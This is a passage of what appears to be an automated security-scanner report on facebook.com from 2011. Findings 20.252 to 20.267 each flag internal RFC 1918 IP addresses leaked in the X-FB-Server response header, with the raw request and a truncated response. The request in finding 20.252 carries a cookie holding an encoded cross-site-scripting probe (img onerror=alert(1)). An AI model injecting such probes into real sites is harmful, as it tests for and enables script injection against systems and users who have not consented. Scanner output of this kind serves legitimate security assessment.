Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=L4Nps; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.31
X-Cnection: close
Date: Thu, 05 May 2011 11:43:06 GMT
Content-Length: 14549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.252. http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan/100000824820783/x22

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.155.61

Request

GET /people/Bucky-Jordan/100000824820783/x22 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: /x22
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.61
Connection: close
Date: Thu, 05 May 2011 11:43:06 GMT
Content-Length: 4

/x22

20.253. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.55.45

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.55.45
X-Cnection: close
Date: Thu, 05 May 2011 01:41:45 GMT
Content-Length: 11988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.254. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.199.52

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.199.52
X-Cnection: close
Date: Thu, 05 May 2011 01:36:12 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.255. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.145.52

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.145.52
X-Cnection: close
Date: Thu, 05 May 2011 01:33:22 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.256. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.68.111

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.68.111
X-Cnection: close
Date: Thu, 05 May 2011 02:05:22 GMT
Content-Length: 11988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.257. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.155.61

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.155.61
X-Cnection: close
Date: Thu, 05 May 2011 01:34:47 GMT
Content-Length: 12207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.258. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.43.51.59

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.51.59
X-Cnection: close
Date: Thu, 05 May 2011 00:58:35 GMT
Content-Length: 11937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.259. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.37.69

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.37.69
X-Cnection: close
Date: Thu, 05 May 2011 01:04:06 GMT
Content-Length: 11987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.260. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.98.121

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.98.121
X-Cnection: close
Date: Thu, 05 May 2011 02:08:08 GMT
Content-Length: 11986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.261. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.134.132

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.134.132
X-Cnection: close
Date: Thu, 05 May 2011 02:16:27 GMT
Content-Length: 11936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.262. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.36.118.101

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.118.101
X-Cnection: close
Date: Thu, 05 May 2011 01:12:27 GMT
Content-Length: 12207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.263. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.136.27

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.136.27
X-Cnection: close
Date: Thu, 05 May 2011 02:10:56 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.264. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.240.77

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.240.77
X-Cnection: close
Date: Thu, 05 May 2011 01:47:22 GMT
Content-Length: 11986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.265. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.76.29

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.76.29
X-Cnection: close
Date: Thu, 05 May 2011 01:37:36 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.266. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.55.108

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.55.108
X-Cnection: close
Date: Thu, 05 May 2011 02:06:45 GMT
Content-Length: 11988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.267. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.153.43

Request

